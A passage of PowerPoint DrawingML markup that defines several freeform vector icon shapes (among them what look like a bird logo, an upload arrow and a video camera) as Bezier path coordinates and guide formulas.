                      <a:pt x="47" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="84"/>
                      <a:pt x="46" y="81"/>
                      <a:pt x="45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87" y="81"/>
                      <a:pt x="86" y="84"/>
                      <a:pt x="86" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="96"/>
                      <a:pt x="93" y="103"/>
                      <a:pt x="102" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="103"/>
                      <a:pt x="118" y="96"/>
                      <a:pt x="118" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="84"/>
                      <a:pt x="117" y="81"/>
                      <a:pt x="115" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="79"/>
                      <a:pt x="125" y="79"/>
                      <a:pt x="125" y="79"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="125" y="55"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="86" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="36"/>
                      <a:pt x="86" y="36"/>
                      <a:pt x="86" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="36"/>
                      <a:pt x="102" y="36"/>
                      <a:pt x="102" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="55"/>
                      <a:pt x="112" y="55"/>
                      <a:pt x="112" y="55"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="86" y="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4" name="Freeform 139">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99DE4AE0-8439-4C02-9224-0098404DEB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50684" y="3160712"/>
                <a:ext cx="336661" cy="336661"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 101 w 105"/>
                  <a:gd name="T1" fmla="*/ 29 h 105"/>
                  <a:gd name="T2" fmla="*/ 72 w 105"/>
                  <a:gd name="T3" fmla="*/ 26 h 105"/>
                  <a:gd name="T4" fmla="*/ 89 w 105"/>
                  <a:gd name="T5" fmla="*/ 10 h 105"/>
                  <a:gd name="T6" fmla="*/ 82 w 105"/>
                  <a:gd name="T7" fmla="*/ 3 h 105"/>
                  <a:gd name="T8" fmla="*/ 59 w 105"/>
                  <a:gd name="T9" fmla="*/ 26 h 105"/>
                  <a:gd name="T10" fmla="*/ 53 w 105"/>
                  <a:gd name="T11" fmla="*/ 26 h 105"/>
                  <a:gd name="T12" fmla="*/ 53 w 105"/>
                  <a:gd name="T13" fmla="*/ 26 h 105"/>
                  <a:gd name="T14" fmla="*/ 26 w 105"/>
                  <a:gd name="T15" fmla="*/ 0 h 105"/>
                  <a:gd name="T16" fmla="*/ 20 w 105"/>
                  <a:gd name="T17" fmla="*/ 6 h 105"/>
                  <a:gd name="T18" fmla="*/ 40 w 105"/>
                  <a:gd name="T19" fmla="*/ 26 h 105"/>
                  <a:gd name="T20" fmla="*/ 4 w 105"/>
                  <a:gd name="T21" fmla="*/ 29 h 105"/>
                  <a:gd name="T22" fmla="*/ 0 w 105"/>
                  <a:gd name="T23" fmla="*/ 65 h 105"/>
                  <a:gd name="T24" fmla="*/ 4 w 105"/>
                  <a:gd name="T25" fmla="*/ 102 h 105"/>
                  <a:gd name="T26" fmla="*/ 53 w 105"/>
                  <a:gd name="T27" fmla="*/ 105 h 105"/>
                  <a:gd name="T28" fmla="*/ 101 w 105"/>
                  <a:gd name="T29" fmla="*/ 102 h 105"/>
                  <a:gd name="T30" fmla="*/ 105 w 105"/>
                  <a:gd name="T31" fmla="*/ 65 h 105"/>
                  <a:gd name="T32" fmla="*/ 101 w 105"/>
                  <a:gd name="T33" fmla="*/ 29 h 105"/>
                  <a:gd name="T34" fmla="*/ 89 w 105"/>
                  <a:gd name="T35" fmla="*/ 90 h 105"/>
                  <a:gd name="T36" fmla="*/ 53 w 105"/>
                  <a:gd name="T37" fmla="*/ 92 h 105"/>
                  <a:gd name="T38" fmla="*/ 16 w 105"/>
                  <a:gd name="T39" fmla="*/ 90 h 105"/>
                  <a:gd name="T40" fmla="*/ 13 w 105"/>
                  <a:gd name="T41" fmla="*/ 65 h 105"/>
                  <a:gd name="T42" fmla="*/ 16 w 105"/>
                  <a:gd name="T43" fmla="*/ 41 h 105"/>
                  <a:gd name="T44" fmla="*/ 53 w 105"/>
                  <a:gd name="T45" fmla="*/ 39 h 105"/>
                  <a:gd name="T46" fmla="*/ 89 w 105"/>
                  <a:gd name="T47" fmla="*/ 41 h 105"/>
                  <a:gd name="T48" fmla="*/ 92 w 105"/>
                  <a:gd name="T49" fmla="*/ 65 h 105"/>
                  <a:gd name="T50" fmla="*/ 89 w 105"/>
                  <a:gd name="T51" fmla="*/ 9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05">
                    <a:moveTo>
                      <a:pt x="101" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="28"/>
                      <a:pt x="82" y="27"/>
                      <a:pt x="72" y="26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7" y="26"/>
                      <a:pt x="55" y="26"/>
                      <a:pt x="53" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="26"/>
                      <a:pt x="53" y="26"/>
                      <a:pt x="53" y="2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27" y="27"/>
                      <a:pt x="15" y="28"/>
                      <a:pt x="4" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="40"/>
                      <a:pt x="0" y="53"/>
                      <a:pt x="0" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="78"/>
                      <a:pt x="2" y="91"/>
                      <a:pt x="4" y="102"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="104"/>
                      <a:pt x="35" y="105"/>
                      <a:pt x="53" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="105"/>
                      <a:pt x="86" y="104"/>
                      <a:pt x="101" y="102"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="91"/>
                      <a:pt x="105" y="78"/>
                      <a:pt x="105" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="53"/>
                      <a:pt x="104" y="40"/>
                      <a:pt x="101" y="29"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="89" y="90"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="91"/>
                      <a:pt x="65" y="92"/>
                      <a:pt x="53" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="92"/>
                      <a:pt x="27" y="91"/>
                      <a:pt x="16" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="82"/>
                      <a:pt x="13" y="74"/>
                      <a:pt x="13" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="57"/>
                      <a:pt x="14" y="49"/>
                      <a:pt x="16" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="40"/>
                      <a:pt x="40" y="39"/>
                      <a:pt x="53" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="39"/>
                      <a:pt x="78" y="40"/>
                      <a:pt x="89" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="92" y="57"/>
                      <a:pt x="92" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="74"/>
                      <a:pt x="91" y="82"/>
                      <a:pt x="89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5" name="Freeform 140">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4F73C4A-B935-42C6-854C-D644F0795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74172" y="2775119"/>
                <a:ext cx="428656" cy="348404"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 134 w 134"/>
                  <a:gd name="T1" fmla="*/ 13 h 109"/>
                  <a:gd name="T2" fmla="*/ 118 w 134"/>
                  <a:gd name="T3" fmla="*/ 17 h 109"/>
                  <a:gd name="T4" fmla="*/ 130 w 134"/>
                  <a:gd name="T5" fmla="*/ 2 h 109"/>
                  <a:gd name="T6" fmla="*/ 113 w 134"/>
                  <a:gd name="T7" fmla="*/ 9 h 109"/>
                  <a:gd name="T8" fmla="*/ 93 w 134"/>
                  <a:gd name="T9" fmla="*/ 0 h 109"/>
                  <a:gd name="T10" fmla="*/ 65 w 134"/>
                  <a:gd name="T11" fmla="*/ 28 h 109"/>
                  <a:gd name="T12" fmla="*/ 66 w 134"/>
                  <a:gd name="T13" fmla="*/ 34 h 109"/>
                  <a:gd name="T14" fmla="*/ 10 w 134"/>
                  <a:gd name="T15" fmla="*/ 5 h 109"/>
                  <a:gd name="T16" fmla="*/ 6 w 134"/>
                  <a:gd name="T17" fmla="*/ 19 h 109"/>
                  <a:gd name="T18" fmla="*/ 18 w 134"/>
                  <a:gd name="T19" fmla="*/ 42 h 109"/>
                  <a:gd name="T20" fmla="*/ 6 w 134"/>
                  <a:gd name="T21" fmla="*/ 38 h 109"/>
                  <a:gd name="T22" fmla="*/ 6 w 134"/>
                  <a:gd name="T23" fmla="*/ 39 h 109"/>
                  <a:gd name="T24" fmla="*/ 28 w 134"/>
                  <a:gd name="T25" fmla="*/ 66 h 109"/>
                  <a:gd name="T26" fmla="*/ 20 w 134"/>
                  <a:gd name="T27" fmla="*/ 67 h 109"/>
                  <a:gd name="T28" fmla="*/ 15 w 134"/>
                  <a:gd name="T29" fmla="*/ 66 h 109"/>
                  <a:gd name="T30" fmla="*/ 41 w 134"/>
                  <a:gd name="T31" fmla="*/ 85 h 109"/>
                  <a:gd name="T32" fmla="*/ 7 w 134"/>
                  <a:gd name="T33" fmla="*/ 97 h 109"/>
                  <a:gd name="T34" fmla="*/ 0 w 134"/>
                  <a:gd name="T35" fmla="*/ 96 h 109"/>
                  <a:gd name="T36" fmla="*/ 42 w 134"/>
                  <a:gd name="T37" fmla="*/ 109 h 109"/>
                  <a:gd name="T38" fmla="*/ 120 w 134"/>
                  <a:gd name="T39" fmla="*/ 31 h 109"/>
                  <a:gd name="T40" fmla="*/ 120 w 134"/>
                  <a:gd name="T41" fmla="*/ 27 h 109"/>
                  <a:gd name="T42" fmla="*/ 134 w 134"/>
                  <a:gd name="T43" fmla="*/ 13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4" h="109">
                    <a:moveTo>
                      <a:pt x="134" y="13"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="15"/>
                      <a:pt x="124" y="17"/>
                      <a:pt x="118" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="14"/>
                      <a:pt x="128" y="9"/>
                      <a:pt x="130" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="5"/>
                      <a:pt x="119" y="8"/>
                      <a:pt x="113" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="3"/>
                      <a:pt x="101" y="0"/>
                      <a:pt x="93" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="0"/>
                      <a:pt x="65" y="12"/>
                      <a:pt x="65" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="30"/>
                      <a:pt x="66" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="33"/>
                      <a:pt x="23" y="22"/>
                      <a:pt x="10" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="9"/>
                      <a:pt x="6" y="14"/>
                      <a:pt x="6" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="28"/>
                      <a:pt x="11" y="37"/>
                      <a:pt x="18" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="42"/>
                      <a:pt x="9" y="40"/>
                      <a:pt x="6" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="38"/>
                      <a:pt x="6" y="39"/>
                      <a:pt x="6" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="52"/>
                      <a:pt x="15" y="63"/>
                      <a:pt x="28" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="66"/>
                      <a:pt x="23" y="67"/>
                      <a:pt x="20" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="67"/>
                      <a:pt x="17" y="66"/>
                      <a:pt x="15" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="77"/>
                      <a:pt x="29" y="85"/>
                      <a:pt x="41" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="92"/>
                      <a:pt x="20" y="97"/>
                      <a:pt x="7" y="97"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="97"/>
                      <a:pt x="2" y="97"/>
                      <a:pt x="0" y="96"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="104"/>
                      <a:pt x="27" y="109"/>
                      <a:pt x="42" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="109"/>
                      <a:pt x="120" y="67"/>
                      <a:pt x="120" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="30"/>
                      <a:pt x="120" y="28"/>
                      <a:pt x="120" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="23"/>
                      <a:pt x="130" y="18"/>
                      <a:pt x="134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6" name="Freeform 141">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3782255A-AE81-480D-992A-15726A5E85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5990" y="4558244"/>
                <a:ext cx="414954" cy="391466"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 93 w 212"/>
                  <a:gd name="T1" fmla="*/ 107 h 200"/>
                  <a:gd name="T2" fmla="*/ 119 w 212"/>
                  <a:gd name="T3" fmla="*/ 107 h 200"/>
                  <a:gd name="T4" fmla="*/ 119 w 212"/>
                  <a:gd name="T5" fmla="*/ 54 h 200"/>
                  <a:gd name="T6" fmla="*/ 158 w 212"/>
                  <a:gd name="T7" fmla="*/ 54 h 200"/>
                  <a:gd name="T8" fmla="*/ 106 w 212"/>
                  <a:gd name="T9" fmla="*/ 0 h 200"/>
                  <a:gd name="T10" fmla="*/ 52 w 212"/>
                  <a:gd name="T11" fmla="*/ 54 h 200"/>
                  <a:gd name="T12" fmla="*/ 93 w 212"/>
                  <a:gd name="T13" fmla="*/ 54 h 200"/>
                  <a:gd name="T14" fmla="*/ 93 w 212"/>
                  <a:gd name="T15" fmla="*/ 107 h 200"/>
                  <a:gd name="T16" fmla="*/ 132 w 212"/>
                  <a:gd name="T17" fmla="*/ 77 h 200"/>
                  <a:gd name="T18" fmla="*/ 132 w 212"/>
                  <a:gd name="T19" fmla="*/ 97 h 200"/>
                  <a:gd name="T20" fmla="*/ 192 w 212"/>
                  <a:gd name="T21" fmla="*/ 120 h 200"/>
                  <a:gd name="T22" fmla="*/ 106 w 212"/>
                  <a:gd name="T23" fmla="*/ 152 h 200"/>
                  <a:gd name="T24" fmla="*/ 18 w 212"/>
                  <a:gd name="T25" fmla="*/ 120 h 200"/>
                  <a:gd name="T26" fmla="*/ 78 w 212"/>
                  <a:gd name="T27" fmla="*/ 97 h 200"/>
                  <a:gd name="T28" fmla="*/ 78 w 212"/>
                  <a:gd name="T29" fmla="*/ 77 h 200"/>
                  <a:gd name="T30" fmla="*/ 0 w 212"/>
                  <a:gd name="T31" fmla="*/ 107 h 200"/>
                  <a:gd name="T32" fmla="*/ 0 w 212"/>
                  <a:gd name="T33" fmla="*/ 160 h 200"/>
                  <a:gd name="T34" fmla="*/ 106 w 212"/>
                  <a:gd name="T35" fmla="*/ 200 h 200"/>
                  <a:gd name="T36" fmla="*/ 212 w 212"/>
                  <a:gd name="T37" fmla="*/ 160 h 200"/>
                  <a:gd name="T38" fmla="*/ 212 w 212"/>
                  <a:gd name="T39" fmla="*/ 107 h 200"/>
                  <a:gd name="T40" fmla="*/ 132 w 212"/>
                  <a:gd name="T41" fmla="*/ 7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2" h="200">
                    <a:moveTo>
                      <a:pt x="93" y="107"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="119" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="107"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="132" y="77"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="132" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132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7" name="Freeform 142">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0784337B-A531-4059-BD68-B0FB7F3041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46417" y="4981027"/>
                <a:ext cx="317087" cy="240751"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 99"/>
                  <a:gd name="T1" fmla="*/ 16 h 75"/>
                  <a:gd name="T2" fmla="*/ 53 w 99"/>
                  <a:gd name="T3" fmla="*/ 31 h 75"/>
                  <a:gd name="T4" fmla="*/ 68 w 99"/>
                  <a:gd name="T5" fmla="*/ 16 h 75"/>
                  <a:gd name="T6" fmla="*/ 53 w 99"/>
                  <a:gd name="T7" fmla="*/ 0 h 75"/>
                  <a:gd name="T8" fmla="*/ 37 w 99"/>
                  <a:gd name="T9" fmla="*/ 16 h 75"/>
                  <a:gd name="T10" fmla="*/ 0 w 99"/>
                  <a:gd name="T11" fmla="*/ 16 h 75"/>
                  <a:gd name="T12" fmla="*/ 16 w 99"/>
                  <a:gd name="T13" fmla="*/ 31 h 75"/>
                  <a:gd name="T14" fmla="*/ 31 w 99"/>
                  <a:gd name="T15" fmla="*/ 16 h 75"/>
                  <a:gd name="T16" fmla="*/ 16 w 99"/>
                  <a:gd name="T17" fmla="*/ 0 h 75"/>
                  <a:gd name="T18" fmla="*/ 0 w 99"/>
                  <a:gd name="T19" fmla="*/ 16 h 75"/>
                  <a:gd name="T20" fmla="*/ 74 w 99"/>
                  <a:gd name="T21" fmla="*/ 47 h 75"/>
                  <a:gd name="T22" fmla="*/ 74 w 99"/>
                  <a:gd name="T23" fmla="*/ 37 h 75"/>
                  <a:gd name="T24" fmla="*/ 68 w 99"/>
                  <a:gd name="T25" fmla="*/ 31 h 75"/>
                  <a:gd name="T26" fmla="*/ 53 w 99"/>
                  <a:gd name="T27" fmla="*/ 31 h 75"/>
                  <a:gd name="T28" fmla="*/ 16 w 99"/>
                  <a:gd name="T29" fmla="*/ 31 h 75"/>
                  <a:gd name="T30" fmla="*/ 6 w 99"/>
                  <a:gd name="T31" fmla="*/ 31 h 75"/>
                  <a:gd name="T32" fmla="*/ 0 w 99"/>
                  <a:gd name="T33" fmla="*/ 37 h 75"/>
                  <a:gd name="T34" fmla="*/ 0 w 99"/>
                  <a:gd name="T35" fmla="*/ 68 h 75"/>
                  <a:gd name="T36" fmla="*/ 6 w 99"/>
                  <a:gd name="T37" fmla="*/ 75 h 75"/>
                  <a:gd name="T38" fmla="*/ 68 w 99"/>
                  <a:gd name="T39" fmla="*/ 75 h 75"/>
                  <a:gd name="T40" fmla="*/ 74 w 99"/>
                  <a:gd name="T41" fmla="*/ 68 h 75"/>
                  <a:gd name="T42" fmla="*/ 74 w 99"/>
                  <a:gd name="T43" fmla="*/ 59 h 75"/>
                  <a:gd name="T44" fmla="*/ 99 w 99"/>
                  <a:gd name="T45" fmla="*/ 75 h 75"/>
                  <a:gd name="T46" fmla="*/ 99 w 99"/>
                  <a:gd name="T47" fmla="*/ 31 h 75"/>
                  <a:gd name="T48" fmla="*/ 74 w 99"/>
                  <a:gd name="T49" fmla="*/ 47 h 75"/>
                  <a:gd name="T50" fmla="*/ 62 w 99"/>
                  <a:gd name="T51" fmla="*/ 62 h 75"/>
                  <a:gd name="T52" fmla="*/ 13 w 99"/>
                  <a:gd name="T53" fmla="*/ 62 h 75"/>
                  <a:gd name="T54" fmla="*/ 13 w 99"/>
                  <a:gd name="T55" fmla="*/ 44 h 75"/>
                  <a:gd name="T56" fmla="*/ 62 w 99"/>
                  <a:gd name="T57" fmla="*/ 44 h 75"/>
                  <a:gd name="T58" fmla="*/ 62 w 99"/>
                  <a:gd name="T59" fmla="*/ 6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9" h="75">
                    <a:moveTo>
                      <a:pt x="37" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="24"/>
                      <a:pt x="44" y="31"/>
                      <a:pt x="53" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="31"/>
                      <a:pt x="68" y="24"/>
                      <a:pt x="68" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="7"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="53" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="0"/>
                      <a:pt x="37" y="7"/>
                      <a:pt x="37" y="16"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:move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1" y="24"/>
                      <a:pt x="31" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="7"/>
                      <a:pt x="24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lose/>
                    <a:moveTo>
                      <a:pt x="74" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="37"/>
                      <a:pt x="74" y="37"/>
                      <a:pt x="74" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="34"/>
                      <a:pt x="72" y="31"/>
                      <a:pt x="68" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="31"/>
                      <a:pt x="53" y="31"/>
                      <a:pt x="53" y="31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3" y="31"/>
                      <a:pt x="0" y="34"/>
                      <a:pt x="0" y="37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2"/>
                      <a:pt x="3" y="75"/>
                      <a:pt x="6" y="75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72" y="75"/>
                      <a:pt x="74" y="72"/>
                      <a:pt x="74" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="59"/>
                      <a:pt x="74" y="59"/>
                      <a:pt x="74" y="59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99" y="31"/>
                      <a:pt x="99" y="31"/>
                      <a:pt x="99" y="31"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="74" y="47"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="62" y="62"/>
                    </a:move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44"/>
                      <a:pt x="13" y="44"/>
                      <a:pt x="13" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="44"/>
                      <a:pt x="62" y="44"/>
                      <a:pt x="62" y="44"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="62" y="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8" name="Freeform 143">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{533D8DDE-1E50-48C7-805B-34EF3FCF49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2038" y="4200054"/>
                <a:ext cx="336661" cy="340575"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 105"/>
                  <a:gd name="T1" fmla="*/ 0 h 106"/>
                  <a:gd name="T2" fmla="*/ 0 w 105"/>
                  <a:gd name="T3" fmla="*/ 53 h 106"/>
                  <a:gd name="T4" fmla="*/ 53 w 105"/>
                  <a:gd name="T5" fmla="*/ 106 h 106"/>
                  <a:gd name="T6" fmla="*/ 105 w 105"/>
                  <a:gd name="T7" fmla="*/ 53 h 106"/>
                  <a:gd name="T8" fmla="*/ 53 w 105"/>
                  <a:gd name="T9" fmla="*/ 0 h 106"/>
                  <a:gd name="T10" fmla="*/ 84 w 105"/>
                  <a:gd name="T11" fmla="*/ 45 h 106"/>
                  <a:gd name="T12" fmla="*/ 55 w 105"/>
                  <a:gd name="T13" fmla="*/ 85 h 106"/>
                  <a:gd name="T14" fmla="*/ 41 w 105"/>
                  <a:gd name="T15" fmla="*/ 80 h 106"/>
                  <a:gd name="T16" fmla="*/ 31 w 105"/>
                  <a:gd name="T17" fmla="*/ 48 h 106"/>
                  <a:gd name="T18" fmla="*/ 24 w 105"/>
                  <a:gd name="T19" fmla="*/ 50 h 106"/>
                  <a:gd name="T20" fmla="*/ 21 w 105"/>
                  <a:gd name="T21" fmla="*/ 47 h 106"/>
                  <a:gd name="T22" fmla="*/ 40 w 105"/>
                  <a:gd name="T23" fmla="*/ 33 h 106"/>
                  <a:gd name="T24" fmla="*/ 51 w 105"/>
                  <a:gd name="T25" fmla="*/ 54 h 106"/>
                  <a:gd name="T26" fmla="*/ 56 w 105"/>
                  <a:gd name="T27" fmla="*/ 67 h 106"/>
                  <a:gd name="T28" fmla="*/ 64 w 105"/>
                  <a:gd name="T29" fmla="*/ 55 h 106"/>
                  <a:gd name="T30" fmla="*/ 57 w 105"/>
                  <a:gd name="T31" fmla="*/ 47 h 106"/>
                  <a:gd name="T32" fmla="*/ 84 w 105"/>
                  <a:gd name="T33" fmla="*/ 4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5" h="106">
                    <a:moveTo>
                      <a:pt x="53" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="0"/>
                      <a:pt x="0" y="24"/>
                      <a:pt x="0" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="82"/>
                      <a:pt x="23" y="106"/>
                      <a:pt x="53" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="106"/>
                      <a:pt x="105" y="82"/>
                      <a:pt x="105" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="24"/>
                      <a:pt x="82" y="0"/>
                      <a:pt x="53" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="84" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="65"/>
                      <a:pt x="61" y="82"/>
                      <a:pt x="55" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="89"/>
                      <a:pt x="43" y="84"/>
                      <a:pt x="41" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="75"/>
                      <a:pt x="33" y="50"/>
                      <a:pt x="31" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="46"/>
                      <a:pt x="24" y="50"/>
                      <a:pt x="24" y="50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32" y="34"/>
                      <a:pt x="40" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="31"/>
                      <a:pt x="49" y="46"/>
                      <a:pt x="51" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="62"/>
                      <a:pt x="54" y="67"/>
                      <a:pt x="56" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="67"/>
                      <a:pt x="61" y="62"/>
                      <a:pt x="64" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="64" y="43"/>
                      <a:pt x="57" y="47"/>
